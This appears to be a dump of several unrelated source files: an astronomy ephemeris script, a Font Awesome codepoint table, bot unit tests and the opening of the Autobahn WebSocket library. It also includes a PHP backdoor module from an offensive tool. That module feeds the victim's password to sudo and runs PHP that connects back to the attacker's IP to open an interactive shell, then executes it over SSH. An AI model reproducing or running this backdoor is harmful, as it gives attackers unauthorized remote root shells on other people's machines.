ephTimes = np.array(zip(times, repeat(1, len(times))), dtype='double')
print times
dt, t = dtime(t)
print "Ready for ephemeris generation .. %f s" %(dt)
# Generate ephemerides.
oorbephs, err = oo.pyoorb.oorb_ephemeris(in_orbits = oorbArray, in_obscode=obscode, in_date_ephems=ephTimes)
dt, t = dtime(t)
print "Calculating ephemerides by python required %f s" %(dt)
# Returned ephems contain a 3-D Fortran array of ephemerides, the axes are:
# [objid][time][ephemeris information element]
# the ephemeris information elements are (in order):
# distance, ra, dec, mag, ephem mjd, ephem mjd timescale, dradt(sky), ddecdt(sky)
# per object, per date, 8 elements (array shape is OBJ(s)/DATE(s)/VALUES)
# Note that ra/dec, dradt, etc. are all in DEGREES.
# First: (to arrange ephems for easier later use)
# Swap the order of the axes: DATE / Objs / values
# Unpack ephemerides.
times = np.ravel(oorbephs.swapaxes(0, 1).swapaxes(0, 2)[4])
ra = np.ravel(oorbephs.swapaxes(0, 1).swapaxes(0, 2)[1])
dec = np.ravel(oorbephs.swapaxes(0, 1).swapaxes(0, 2)[2])
radiff = data['RA'] - ra
decdiff = data['Dec'] - dec
radiff *= 3600
decdiff *= 3600
print "min/max ra offsets", radiff.min(), radiff.max()
print "min/max dec offsets", decdiff.min(), decdiff.max()
plt.figure()
plt.plot(radiff, decdiff, 'k.')
plt.xlabel('Difference in RA (arcsec)')
plt.ylabel('Difference in Dec (arcsec)')
#plt.show()
| gpl-3.0 | 2,614,545,079,291,372,500 | 37.412698 | 149 | 0.633884 | false |
diegomvh/pyqt | widgets/glyph/codepoints/fontawesome.py | 1 | 15278 | #!/usr/bin/env python
import sys
if sys.version_info[0] == 3:
unichr = chr
#A list of all icon-names with the codepoint (unicode-value) on the right
#You can use the names on the page http://fortawesome.github.io/Font-Awesome/design.html
_codepoints = [
("fa-adjust", 0xf042),
("fa-adn", 0xf170),
("fa-align-center", 0xf037),
("fa-align-justify", 0xf039),
("fa-align-left", 0xf036),
("fa-align-right", 0xf038),
("fa-ambulance", 0xf0f9),
("fa-anchor", 0xf13d),
("fa-android", 0xf17b),
("fa-angle-double-down", 0xf103),
("fa-angle-double-left", 0xf100),
("fa-angle-double-right", 0xf101),
("fa-angle-double-up", 0xf102),
("fa-angle-down", 0xf107),
("fa-angle-left", 0xf104),
("fa-angle-right", 0xf105),
("fa-angle-up", 0xf106),
("fa-apple", 0xf179),
("fa-archive", 0xf187),
("fa-arrow-circle-down", 0xf0ab),
("fa-arrow-circle-left", 0xf0a8),
("fa-arrow-circle-o-down", 0xf01a),
("fa-arrow-circle-o-left", 0xf190),
("fa-arrow-circle-o-right", 0xf18e),
("fa-arrow-circle-o-up", 0xf01b),
("fa-arrow-circle-right", 0xf0a9),
("fa-arrow-circle-up", 0xf0aa),
("fa-arrow-down", 0xf063),
("fa-arrow-left", 0xf060),
("fa-arrow-right", 0xf061),
("fa-arrow-up", 0xf062),
("fa-arrows", 0xf047),
("fa-arrows-alt", 0xf0b2),
("fa-arrows-h", 0xf07e),
("fa-arrows-v", 0xf07d),
("fa-asterisk", 0xf069),
("fa-automobile", 0xf1b9),
("fa-backward", 0xf04a),
("fa-ban", 0xf05e),
("fa-bank", 0xf19c),
("fa-bar-chart-o", 0xf080),
("fa-barcode", 0xf02a),
("fa-bars", 0xf0c9),
("fa-beer", 0xf0fc),
("fa-behance", 0xf1b4),
("fa-behance-square", 0xf1b5),
("fa-bell", 0xf0f3),
("fa-bell-o", 0xf0a2),
("fa-bitbucket", 0xf171),
("fa-bitbucket-square", 0xf172),
("fa-bitcoin", 0xf15a),
("fa-bold", 0xf032),
("fa-bolt", 0xf0e7),
("fa-bomb", 0xf1e2),
("fa-book", 0xf02d),
("fa-bookmark", 0xf02e),
("fa-bookmark-o", 0xf097),
("fa-briefcase", 0xf0b1),
("fa-btc", 0xf15a),
("fa-bug", 0xf188),
("fa-building", 0xf1ad),
("fa-building-o", 0xf0f7),
("fa-bullhorn", 0xf0a1),
("fa-bullseye", 0xf140),
("fa-cab", 0xf1ba),
("fa-calendar", 0xf073),
("fa-calendar-o", 0xf133),
("fa-camera", 0xf030),
("fa-camera-retro", 0xf083),
("fa-car", 0xf1b9),
("fa-caret-down", 0xf0d7),
("fa-caret-left", 0xf0d9),
("fa-caret-right", 0xf0da),
("fa-caret-square-o-down", 0xf150),
("fa-caret-square-o-left", 0xf191),
("fa-caret-square-o-right", 0xf152),
("fa-caret-square-o-up", 0xf151),
("fa-caret-up", 0xf0d8),
("fa-certificate", 0xf0a3),
("fa-chain", 0xf0c1),
("fa-chain-broken", 0xf127),
("fa-check", 0xf00c),
("fa-check-circle", 0xf058),
("fa-check-circle-o", 0xf05d),
("fa-check-square", 0xf14a),
("fa-check-square-o", 0xf046),
("fa-chevron-circle-down", 0xf13a),
("fa-chevron-circle-left", 0xf137),
("fa-chevron-circle-right", 0xf138),
("fa-chevron-circle-up", 0xf139),
("fa-chevron-down", 0xf078),
("fa-chevron-left", 0xf053),
("fa-chevron-right", 0xf054),
("fa-chevron-up", 0xf077),
("fa-child", 0xf1ae),
("fa-circle", 0xf111),
("fa-circle-o", 0xf10c),
("fa-circle-o-notch", 0xf1ce),
("fa-circle-thin", 0xf1db),
("fa-clipboard", 0xf0ea),
("fa-clock-o", 0xf017),
("fa-cloud", 0xf0c2),
("fa-cloud-download", 0xf0ed),
("fa-cloud-upload", 0xf0ee),
("fa-cny", 0xf157),
("fa-code", 0xf121),
("fa-code-fork", 0xf126),
("fa-codepen", 0xf1cb),
("fa-coffee", 0xf0f4),
("fa-cog", 0xf013),
("fa-cogs", 0xf085),
("fa-columns", 0xf0db),
("fa-comment", 0xf075),
("fa-comment-o", 0xf0e5),
("fa-comments", 0xf086),
("fa-comments-o", 0xf0e6),
("fa-compass", 0xf14e),
("fa-compress", 0xf066),
("fa-copy", 0xf0c5),
("fa-credit-card", 0xf09d),
("fa-crop", 0xf125),
("fa-crosshairs", 0xf05b),
("fa-css3", 0xf13c),
("fa-cube", 0xf1b2),
("fa-cubes", 0xf1b3),
("fa-cut", 0xf0c4),
("fa-cutlery", 0xf0f5),
("fa-dashboard", 0xf0e4),
("fa-database", 0xf1c0),
("fa-dedent", 0xf03b),
("fa-delicious", 0xf1a5),
("fa-desktop", 0xf108),
("fa-deviantart", 0xf1bd),
("fa-digg", 0xf1a6),
("fa-dollar", 0xf155),
("fa-dot-circle-o", 0xf192),
("fa-download", 0xf019),
("fa-dribbble", 0xf17d),
("fa-dropbox", 0xf16b),
("fa-drupal", 0xf1a9),
("fa-edit", 0xf044),
("fa-eject", 0xf052),
("fa-ellipsis-h", 0xf141),
("fa-ellipsis-v", 0xf142),
("fa-empire", 0xf1d1),
("fa-envelope", 0xf0e0),
("fa-envelope-o", 0xf003),
("fa-envelope-square", 0xf199),
("fa-eraser", 0xf12d),
("fa-eur", 0xf153),
("fa-euro", 0xf153),
("fa-exchange", 0xf0ec),
("fa-exclamation", 0xf12a),
("fa-exclamation-circle", 0xf06a),
("fa-exclamation-triangle", 0xf071),
("fa-expand", 0xf065),
("fa-external-link", 0xf08e),
("fa-external-link-square", 0xf14c),
("fa-eye", 0xf06e),
("fa-eye-slash", 0xf070),
("fa-facebook", 0xf09a),
("fa-facebook-square", 0xf082),
("fa-fast-backward", 0xf049),
("fa-fast-forward", 0xf050),
("fa-fax", 0xf1ac),
("fa-female", 0xf182),
("fa-fighter-jet", 0xf0fb),
("fa-file", 0xf15b),
("fa-file-archive-o", 0xf1c6),
("fa-file-audio-o", 0xf1c7),
("fa-file-code-o", 0xf1c9),
("fa-file-excel-o", 0xf1c3),
("fa-file-image-o", 0xf1c5),
("fa-file-movie-o", 0xf1c8),
("fa-file-o", 0xf016),
("fa-file-pdf-o", 0xf1c1),
("fa-file-photo-o", 0xf1c5),
("fa-file-picture-o", 0xf1c5),
("fa-file-powerpoint-o", 0xf1c4),
("fa-file-sound-o", 0xf1c7),
("fa-file-text", 0xf15c),
("fa-file-text-o", 0xf0f6),
("fa-file-video-o", 0xf1c8),
("fa-file-word-o", 0xf1c2),
("fa-file-zip-o", 0xf1c6),
("fa-files-o", 0xf0c5),
("fa-film", 0xf008),
("fa-filter", 0xf0b0),
("fa-fire", 0xf06d),
("fa-fire-extinguisher", 0xf134),
("fa-flag", 0xf024),
("fa-flag-checkered", 0xf11e),
("fa-flag-o", 0xf11d),
("fa-flash", 0xf0e7),
("fa-flask", 0xf0c3),
("fa-flickr", 0xf16e),
("fa-floppy-o", 0xf0c7),
("fa-folder", 0xf07b),
("fa-folder-o", 0xf114),
("fa-folder-open", 0xf07c),
("fa-folder-open-o", 0xf115),
("fa-font", 0xf031),
("fa-forward", 0xf04e),
("fa-foursquare", 0xf180),
("fa-frown-o", 0xf119),
("fa-gamepad", 0xf11b),
("fa-gavel", 0xf0e3),
("fa-gbp", 0xf154),
("fa-ge", 0xf1d1),
("fa-gear", 0xf013),
("fa-gears", 0xf085),
("fa-gift", 0xf06b),
("fa-git", 0xf1d3),
("fa-git-square", 0xf1d2),
("fa-github", 0xf09b),
("fa-github-alt", 0xf113),
("fa-github-square", 0xf092),
("fa-gittip", 0xf184),
("fa-glass", 0xf000),
("fa-globe", 0xf0ac),
("fa-google", 0xf1a0),
("fa-google-plus", 0xf0d5),
("fa-google-plus-square", 0xf0d4),
("fa-graduation-cap", 0xf19d),
("fa-group", 0xf0c0),
("fa-h-square", 0xf0fd),
("fa-hacker-news", 0xf1d4),
("fa-hand-o-down", 0xf0a7),
("fa-hand-o-left", 0xf0a5),
("fa-hand-o-right", 0xf0a4),
("fa-hand-o-up", 0xf0a6),
("fa-hdd-o", 0xf0a0),
("fa-header", 0xf1dc),
("fa-headphones", 0xf025),
("fa-heart", 0xf004),
("fa-heart-o", 0xf08a),
("fa-history", 0xf1da),
("fa-home", 0xf015),
("fa-hospital-o", 0xf0f8),
("fa-html5", 0xf13b),
("fa-image", 0xf03e),
("fa-inbox", 0xf01c),
("fa-indent", 0xf03c),
("fa-info", 0xf129),
("fa-info-circle", 0xf05a),
("fa-inr", 0xf156),
("fa-instagram", 0xf16d),
("fa-institution", 0xf19c),
("fa-italic", 0xf033),
("fa-joomla", 0xf1aa),
("fa-jpy", 0xf157),
("fa-jsfiddle", 0xf1cc),
("fa-key", 0xf084),
("fa-keyboard-o", 0xf11c),
("fa-krw", 0xf159),
("fa-language", 0xf1ab),
("fa-laptop", 0xf109),
("fa-leaf", 0xf06c),
("fa-legal", 0xf0e3),
("fa-lemon-o", 0xf094),
("fa-level-down", 0xf149),
("fa-level-up", 0xf148),
("fa-life-bouy", 0xf1cd),
("fa-life-ring", 0xf1cd),
("fa-life-saver", 0xf1cd),
("fa-lightbulb-o", 0xf0eb),
("fa-link", 0xf0c1),
("fa-linkedin", 0xf0e1),
("fa-linkedin-square", 0xf08c),
("fa-linux", 0xf17c),
("fa-list", 0xf03a),
("fa-list-alt", 0xf022),
("fa-list-ol", 0xf0cb),
("fa-list-ul", 0xf0ca),
("fa-location-arrow", 0xf124),
("fa-lock", 0xf023),
("fa-long-arrow-down", 0xf175),
("fa-long-arrow-left", 0xf177),
("fa-long-arrow-right", 0xf178),
("fa-long-arrow-up", 0xf176),
("fa-magic", 0xf0d0),
("fa-magnet", 0xf076),
("fa-mail-forward", 0xf064),
("fa-mail-reply", 0xf112),
("fa-mail-reply-all", 0xf122),
("fa-male", 0xf183),
("fa-map-marker", 0xf041),
("fa-maxcdn", 0xf136),
("fa-medkit", 0xf0fa),
("fa-meh-o", 0xf11a),
("fa-microphone", 0xf130),
("fa-microphone-slash", 0xf131),
("fa-minus", 0xf068),
("fa-minus-circle", 0xf056),
("fa-minus-square", 0xf146),
("fa-minus-square-o", 0xf147),
("fa-mobile", 0xf10b),
("fa-mobile-phone", 0xf10b),
("fa-money", 0xf0d6),
("fa-moon-o", 0xf186),
("fa-mortar-board", 0xf19d),
("fa-music", 0xf001),
("fa-navicon", 0xf0c9),
("fa-openid", 0xf19b),
("fa-outdent", 0xf03b),
("fa-pagelines", 0xf18c),
("fa-paper-plane", 0xf1d8),
("fa-paper-plane-o", 0xf1d9),
("fa-paperclip", 0xf0c6),
("fa-paragraph", 0xf1dd),
("fa-paste", 0xf0ea),
("fa-pause", 0xf04c),
("fa-paw", 0xf1b0),
("fa-pencil", 0xf040),
("fa-pencil-square", 0xf14b),
("fa-pencil-square-o", 0xf044),
("fa-phone", 0xf095),
("fa-phone-square", 0xf098),
("fa-photo", 0xf03e),
("fa-picture-o", 0xf03e),
("fa-pied-piper", 0xf1a7),
("fa-pied-piper-alt", 0xf1a8),
("fa-pied-piper-square", 0xf1a7),
("fa-pinterest", 0xf0d2),
("fa-pinterest-square", 0xf0d3),
("fa-plane", 0xf072),
("fa-play", 0xf04b),
("fa-play-circle", 0xf144),
("fa-play-circle-o", 0xf01d),
("fa-plus", 0xf067),
("fa-plus-circle", 0xf055),
("fa-plus-square", 0xf0fe),
("fa-plus-square-o", 0xf196),
("fa-power-off", 0xf011),
("fa-print", 0xf02f),
("fa-puzzle-piece", 0xf12e),
("fa-qq", 0xf1d6),
("fa-qrcode", 0xf029),
("fa-question", 0xf128),
("fa-question-circle", 0xf059),
("fa-quote-left", 0xf10d),
("fa-quote-right", 0xf10e),
("fa-ra", 0xf1d0),
("fa-random", 0xf074),
("fa-rebel", 0xf1d0),
("fa-recycle", 0xf1b8),
("fa-reddit", 0xf1a1),
("fa-reddit-square", 0xf1a2),
("fa-refresh", 0xf021),
("fa-renren", 0xf18b),
("fa-reorder", 0xf0c9),
("fa-repeat", 0xf01e),
("fa-reply", 0xf112),
("fa-reply-all", 0xf122),
("fa-retweet", 0xf079),
("fa-rmb", 0xf157),
("fa-road", 0xf018),
("fa-rocket", 0xf135),
("fa-rotate-left", 0xf0e2),
("fa-rotate-right", 0xf01e),
("fa-rouble", 0xf158),
("fa-rss", 0xf09e),
("fa-rss-square", 0xf143),
("fa-rub", 0xf158),
("fa-ruble", 0xf158),
("fa-rupee", 0xf156),
("fa-save", 0xf0c7),
("fa-scissors", 0xf0c4),
("fa-search", 0xf002),
("fa-search-minus", 0xf010),
("fa-search-plus", 0xf00e),
("fa-send", 0xf1d8),
("fa-send-o", 0xf1d9),
("fa-share", 0xf064),
("fa-share-alt", 0xf1e0),
("fa-share-alt-square", 0xf1e1),
("fa-share-square", 0xf14d),
("fa-share-square-o", 0xf045),
("fa-shield", 0xf132),
("fa-shopping-cart", 0xf07a),
("fa-sign-in", 0xf090),
("fa-sign-out", 0xf08b),
("fa-signal", 0xf012),
("fa-sitemap", 0xf0e8),
("fa-skype", 0xf17e),
("fa-slack", 0xf198),
("fa-sliders", 0xf1de),
("fa-smile-o", 0xf118),
("fa-sort", 0xf0dc),
("fa-sort-alpha-asc", 0xf15d),
("fa-sort-alpha-desc", 0xf15e),
("fa-sort-amount-asc", 0xf160),
("fa-sort-amount-desc", 0xf161),
("fa-sort-asc", 0xf0de),
("fa-sort-desc", 0xf0dd),
("fa-sort-down", 0xf0dd),
("fa-sort-numeric-asc", 0xf162),
("fa-sort-numeric-desc", 0xf163),
("fa-sort-up", 0xf0de),
("fa-soundcloud", 0xf1be),
("fa-space-shuttle", 0xf197),
("fa-spinner", 0xf110),
("fa-spoon", 0xf1b1),
("fa-spotify", 0xf1bc),
("fa-square", 0xf0c8),
("fa-square-o", 0xf096),
("fa-stack-exchange", 0xf18d),
("fa-stack-overflow", 0xf16c),
("fa-star", 0xf005),
("fa-star-half", 0xf089),
("fa-star-half-empty", 0xf123),
("fa-star-half-full", 0xf123),
("fa-star-half-o", 0xf123),
("fa-star-o", 0xf006),
("fa-steam", 0xf1b6),
("fa-steam-square", 0xf1b7),
("fa-step-backward", 0xf048),
("fa-step-forward", 0xf051),
("fa-stethoscope", 0xf0f1),
("fa-stop", 0xf04d),
("fa-strikethrough", 0xf0cc),
("fa-stumbleupon", 0xf1a4),
("fa-stumbleupon-circle", 0xf1a3),
("fa-subscript", 0xf12c),
("fa-suitcase", 0xf0f2),
("fa-sun-o", 0xf185),
("fa-superscript", 0xf12b),
("fa-support", 0xf1cd),
("fa-table", 0xf0ce),
("fa-tablet", 0xf10a),
("fa-tachometer", 0xf0e4),
("fa-tag", 0xf02b),
("fa-tags", 0xf02c),
("fa-tasks", 0xf0ae),
("fa-taxi", 0xf1ba),
("fa-tencent-weibo", 0xf1d5),
("fa-terminal", 0xf120),
("fa-text-height", 0xf034),
("fa-text-width", 0xf035),
("fa-th", 0xf00a),
("fa-th-large", 0xf009),
("fa-th-list", 0xf00b),
("fa-thumb-tack", 0xf08d),
("fa-thumbs-down", 0xf165),
("fa-thumbs-o-down", 0xf088),
("fa-thumbs-o-up", 0xf087),
("fa-thumbs-up", 0xf164),
("fa-ticket", 0xf145),
("fa-times", 0xf00d),
("fa-times-circle", 0xf057),
("fa-times-circle-o", 0xf05c),
("fa-tint", 0xf043),
("fa-toggle-down", 0xf150),
("fa-toggle-left", 0xf191),
("fa-toggle-right", 0xf152),
("fa-toggle-up", 0xf151),
("fa-trash-o", 0xf014),
("fa-tree", 0xf1bb),
("fa-trello", 0xf181),
("fa-trophy", 0xf091),
("fa-truck", 0xf0d1),
("fa-try", 0xf195),
("fa-tumblr", 0xf173),
("fa-tumblr-square", 0xf174),
("fa-turkish-lira", 0xf195),
("fa-twitter", 0xf099),
("fa-twitter-square", 0xf081),
("fa-umbrella", 0xf0e9),
("fa-underline", 0xf0cd),
("fa-undo", 0xf0e2),
("fa-university", 0xf19c),
("fa-unlink", 0xf127),
("fa-unlock", 0xf09c),
("fa-unlock-alt", 0xf13e),
("fa-unsorted", 0xf0dc),
("fa-upload", 0xf093),
("fa-usd", 0xf155),
("fa-user", 0xf007),
("fa-user-md", 0xf0f0),
("fa-users", 0xf0c0),
("fa-video-camera", 0xf03d),
("fa-vimeo-square", 0xf194),
("fa-vine", 0xf1ca),
("fa-vk", 0xf189),
("fa-volume-down", 0xf027),
("fa-volume-off", 0xf026),
("fa-volume-up", 0xf028),
("fa-warning", 0xf071),
("fa-wechat", 0xf1d7),
("fa-weibo", 0xf18a),
("fa-weixin", 0xf1d7),
("fa-wheelchair", 0xf193),
("fa-windows", 0xf17a),
("fa-won", 0xf159),
("fa-wordpress", 0xf19a),
("fa-wrench", 0xf0ad),
("fa-xing", 0xf168),
("fa-xing-square", 0xf169),
("fa-yahoo", 0xf19e),
("fa-yen", 0xf157),
("fa-youtube", 0xf167),
("fa-youtube-play", 0xf16a),
("fa-youtube-square", 0xf166) ]
FontAwesome = dict(( (code[0], unichr(code[1])) for code in _codepoints ))
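# Illustrative usage (assumes the Font Awesome TTF has been loaded into a QFont
# elsewhere in this package): FontAwesome["fa-adjust"] is u'\uf042', a glyph that
# can be set as the text of a widget rendered with that font.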
| mit | -1,730,761,943,699,872,300 | 28.781676 | 88 | 0.544508 | false |
Kkevsterrr/backdoorme | backdoors/shell/php.py | 1 | 1529 | from backdoors.backdoor import *
class Php(Backdoor):
prompt = Fore.RED + "(php) " + Fore.BLUE + ">> " + Fore.RESET
def __init__(self, core):
cmd.Cmd.__init__(self)
self.intro = GOOD + "Using php module..."
self.core = core
self.options = {
"port" : Option("port", 53930, "port to connect to", True),
}
self.allow_modules = True
self.modules = {}
self.help_text = INFO + "Creates and runs a php backdoor which sends output to bash.\n"+INFO+"It does not automatically install a web server, but instead uses the php web module."
def get_command(self):
return "echo " + self.core.curtarget.pword + " | sudo -S php -r '$sock=fsockopen(\"" + self.core.localIP + "\"," + str(self.get_value("port")) + ");exec(\"/bin/sh -i <&3 >&3 2>&3\");'"
def do_exploit(self, args):
port = self.get_value("port")
target = self.core.curtarget
#input("Please enter the following command: nc -v -n -l -p %s in another shell to connect." % port)
self.listen("none", "none")
print(GOOD + "Initializing backdoor...")
target.ssh.exec_command(self.get_command())
for mod in self.modules.keys():
print(INFO + "Attempting to execute " + mod.name + " module...")
mod.exploit(self.get_command())
# for mod in self.portModules.keys():
# print(INFO + "Attempting to execute " + mod.name + " module...")
# mod.exploit(self.get_port())
| mit | 8,837,472,853,760,200,000 | 45.333333 | 192 | 0.568999 | false |
MeGotsThis/BotGotsThis | pkg/custom_command/tests/test_custom_query.py | 1 | 1560 | from lib.data.message import Message
from tests.unittest.base_custom import TestCustomField
# Needs to be imported last
from ..custom import query
class TestCustomCommandCustomQuery(TestCustomField):
def setUp(self):
super().setUp()
self.args = self.args._replace(field='query', message=Message('a b c'))
async def test(self):
self.args = self.args._replace(field='')
self.assertIsNone(await query.fieldQuery(self.args))
async def test_query(self):
self.assertEqual(await query.fieldQuery(self.args), 'b c')
async def test_caps(self):
self.args = self.args._replace(field='QUERY')
self.assertEqual(await query.fieldQuery(self.args), 'b c')
async def test_default(self):
self.args = self.args._replace(message=Message(''),
prefix='[', suffix=']')
self.assertEqual(await query.fieldQuery(self.args), '')
async def test_prefix(self):
self.args = self.args._replace(prefix='[')
self.assertEqual(await query.fieldQuery(self.args), '[b c')
async def test_prefix_blank(self):
self.args = self.args._replace(prefix='')
self.assertEqual(await query.fieldQuery(self.args), 'b c')
async def test_suffix(self):
self.args = self.args._replace(suffix=']')
self.assertEqual(await query.fieldQuery(self.args), 'b c]')
async def test_suffix_blank(self):
self.args = self.args._replace(suffix='')
self.assertEqual(await query.fieldQuery(self.args), 'b c')
| gpl-3.0 | 4,702,043,906,517,372,000 | 35.27907 | 79 | 0.642308 | false |
bzero/bitex | libs/autobahn/websocket.py | 1 | 156783 | ###############################################################################
##
## Copyright 2011-2013 Tavendo GmbH
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
##
###############################################################################
__all__ = ["createWsUrl",
"parseWsUrl",
"connectWS",
"listenWS",
"HttpException",
"ConnectionRequest",
"ConnectionResponse",
"Timings",
"WebSocketProtocol",
"WebSocketFactory",
"WebSocketServerProtocol",
"WebSocketServerFactory",
"WebSocketClientProtocol",
"WebSocketClientFactory"]
## The Python urlparse module currently does not contain the ws/wss
## schemes, so we add those dynamically (which is a hack of course).
##
import urlparse
wsschemes = ["ws", "wss"]
urlparse.uses_relative.extend(wsschemes)
urlparse.uses_netloc.extend(wsschemes)
urlparse.uses_params.extend(wsschemes)
urlparse.uses_query.extend(wsschemes)
urlparse.uses_fragment.extend(wsschemes)
import urllib
import binascii
import hashlib
import base64
import struct
import random
import os
from pprint import pformat
from array import array
from collections import deque
from twisted.internet import reactor, protocol
from twisted.python import log
from _version import __version__
from utf8validator import Utf8Validator
from xormasker import XorMaskerNull, createXorMasker
from httpstatus import *
from util import Stopwatch
def createWsUrl(hostname, port = None, isSecure = False, path = None, params = None):
"""
Create a WebSocket URL from components.
:param hostname: WebSocket server hostname.
:type hostname: str
:param port: WebSocket service port or None (to select default ports 80/443 depending on isSecure).
:type port: int
:param isSecure: Set True for secure WebSocket ("wss" scheme).
:type isSecure: bool
:param path: Path component of addressed resource (will be properly URL escaped).
:type path: str
:param params: A dictionary of key-values to construct the query component of the addressed resource (will be properly URL escaped).
:type params: dict
:returns: str -- Constructed WebSocket URL.
"""
if port is not None:
netloc = "%s:%d" % (hostname, port)
else:
if isSecure:
netloc = "%s:443" % hostname
else:
netloc = "%s:80" % hostname
if isSecure:
scheme = "wss"
else:
scheme = "ws"
if path is not None:
ppath = urllib.quote(path)
else:
ppath = "/"
if params is not None:
query = urllib.urlencode(params)
else:
query = None
return urlparse.urlunparse((scheme, netloc, ppath, None, query, None))
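## Illustrative example (not part of the original module):
##   createWsUrl("localhost", port = 9000, path = "/myresource", params = {"param1": 23})
##   returns "ws://localhost:9000/myresource?param1=23"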
def parseWsUrl(url):
"""
   Parses a WebSocket URL into its components and returns a tuple (isSecure, host, port, resource, path, params).
isSecure is a flag which is True for wss URLs.
host is the hostname or IP from the URL.
port is the port from the URL or standard port derived from scheme (ws = 80, wss = 443).
resource is the /resource name/ from the URL, the /path/ together with the (optional) /query/ component.
path is the /path/ component properly unescaped.
   params is the /query/ component properly unescaped and returned as a dictionary.
   :param url: A valid WebSocket URL, i.e. `ws://localhost:9000/myresource?param1=23&param2=666`
:type url: str
:returns: tuple -- A tuple (isSecure, host, port, resource, path, params)
"""
parsed = urlparse.urlparse(url)
if parsed.scheme not in ["ws", "wss"]:
raise Exception("invalid WebSocket scheme '%s'" % parsed.scheme)
if parsed.port is None or parsed.port == "":
if parsed.scheme == "ws":
port = 80
else:
port = 443
else:
port = int(parsed.port)
if parsed.fragment is not None and parsed.fragment != "":
raise Exception("invalid WebSocket URL: non-empty fragment '%s" % parsed.fragment)
if parsed.path is not None and parsed.path != "":
ppath = parsed.path
path = urllib.unquote(ppath)
else:
ppath = "/"
path = ppath
if parsed.query is not None and parsed.query != "":
resource = ppath + "?" + parsed.query
params = urlparse.parse_qs(parsed.query)
else:
resource = ppath
params = {}
return (parsed.scheme == "wss", parsed.hostname, port, resource, path, params)
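## Illustrative example (not part of the original module):
##   parseWsUrl("ws://localhost:9000/myresource?param1=23")
##   returns (False, "localhost", 9000, "/myresource?param1=23", "/myresource", {"param1": ["23"]})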
def connectWS(factory, contextFactory = None, timeout = 30, bindAddress = None):
"""
Establish WebSocket connection to a server. The connection parameters like target
host, port, resource and others are provided via the factory.
:param factory: The WebSocket protocol factory to be used for creating client protocol instances.
:type factory: An :class:`autobahn.websocket.WebSocketClientFactory` instance.
:param contextFactory: SSL context factory, required for secure WebSocket connections ("wss").
:type contextFactory: A `twisted.internet.ssl.ClientContextFactory <http://twistedmatrix.com/documents/current/api/twisted.internet.ssl.ClientContextFactory.html>`_ instance.
:param timeout: Number of seconds to wait before assuming the connection has failed.
:type timeout: int
:param bindAddress: A (host, port) tuple of local address to bind to, or None.
:type bindAddress: tuple
:returns: obj -- An object which implements `twisted.interface.IConnector <http://twistedmatrix.com/documents/current/api/twisted.internet.interfaces.IConnector.html>`_.
"""
if factory.proxy is not None:
if factory.isSecure:
raise Exception("WSS over explicit proxies not implemented")
else:
conn = reactor.connectTCP(factory.proxy['host'], factory.proxy['port'], factory, timeout, bindAddress)
else:
if factory.isSecure:
if contextFactory is None:
# create default client SSL context factory when none given
from twisted.internet import ssl
contextFactory = ssl.ClientContextFactory()
conn = reactor.connectSSL(factory.host, factory.port, factory, contextFactory, timeout, bindAddress)
else:
conn = reactor.connectTCP(factory.host, factory.port, factory, timeout, bindAddress)
return conn
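## Illustrative usage (MyClientProtocol is a hypothetical WebSocketClientProtocol subclass):
##   factory = WebSocketClientFactory("ws://localhost:9000")
##   factory.protocol = MyClientProtocol
##   connectWS(factory)
##   reactor.run()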
def listenWS(factory, contextFactory = None, backlog = 50, interface = ''):
"""
Listen for incoming WebSocket connections from clients. The connection parameters like
listening port and others are provided via the factory.
:param factory: The WebSocket protocol factory to be used for creating server protocol instances.
:type factory: An :class:`autobahn.websocket.WebSocketServerFactory` instance.
:param contextFactory: SSL context factory, required for secure WebSocket connections ("wss").
:type contextFactory: A twisted.internet.ssl.ContextFactory.
:param backlog: Size of the listen queue.
:type backlog: int
:param interface: The interface (derived from hostname given) to bind to, defaults to '' (all).
:type interface: str
:returns: obj -- An object that implements `twisted.interface.IListeningPort <http://twistedmatrix.com/documents/current/api/twisted.internet.interfaces.IListeningPort.html>`_.
"""
if factory.isSecure:
if contextFactory is None:
raise Exception("Secure WebSocket listen requested, but no SSL context factory given")
listener = reactor.listenSSL(factory.port, factory, contextFactory, backlog, interface)
else:
listener = reactor.listenTCP(factory.port, factory, backlog, interface)
return listener
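## Illustrative usage (MyServerProtocol is a hypothetical WebSocketServerProtocol subclass):
##   factory = WebSocketServerFactory("ws://localhost:9000")
##   factory.protocol = MyServerProtocol
##   listenWS(factory)
##   reactor.run()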
class FrameHeader:
"""
Thin-wrapper for storing WebSocket frame metadata.
FOR INTERNAL USE ONLY!
"""
def __init__(self, opcode, fin, rsv, length, mask):
"""
Constructor.
:param opcode: Frame opcode (0-15).
:type opcode: int
:param fin: Frame FIN flag.
:type fin: bool
:param rsv: Frame reserved flags (0-7).
:type rsv: int
:param length: Frame payload length.
:type length: int
:param mask: Frame mask (binary string) or None.
:type mask: str
"""
self.opcode = opcode
self.fin = fin
self.rsv = rsv
self.length = length
self.mask = mask
class HttpException:
"""
Throw an instance of this class to deny a WebSocket connection
during handshake in :meth:`autobahn.websocket.WebSocketServerProtocol.onConnect`.
You can find definitions of HTTP status codes in module :mod:`autobahn.httpstatus`.
"""
def __init__(self, code, reason):
"""
Constructor.
:param code: HTTP error code.
:type code: int
:param reason: HTTP error reason.
:type reason: str
"""
self.code = code
self.reason = reason
class ConnectionRequest:
"""
Thin-wrapper for WebSocket connection request information
provided in :meth:`autobahn.websocket.WebSocketServerProtocol.onConnect` when a WebSocket
client establishes a connection to a WebSocket server.
"""
def __init__(self, peer, peerstr, headers, host, path, params, version, origin, protocols, extensions):
"""
Constructor.
:param peer: IP address/port of the connecting client.
:type peer: object
:param peerstr: IP address/port of the connecting client as string.
:type peerstr: str
:param headers: HTTP headers from opening handshake request.
:type headers: dict
:param host: Host from opening handshake HTTP header.
:type host: str
:param path: Path from requested HTTP resource URI. For example, a resource URI of `/myservice?foo=23&foo=66&bar=2` will be parsed to `/myservice`.
:type path: str
:param params: Query parameters (if any) from requested HTTP resource URI. For example, a resource URI of `/myservice?foo=23&foo=66&bar=2` will be parsed to `{'foo': ['23', '66'], 'bar': ['2']}`.
:type params: dict of arrays of strings
:param version: The WebSocket protocol version the client announced (and will be spoken, when connection is accepted).
:type version: int
:param origin: The WebSocket origin header or None. Note that this only a reliable source of information for browser clients!
:type origin: str
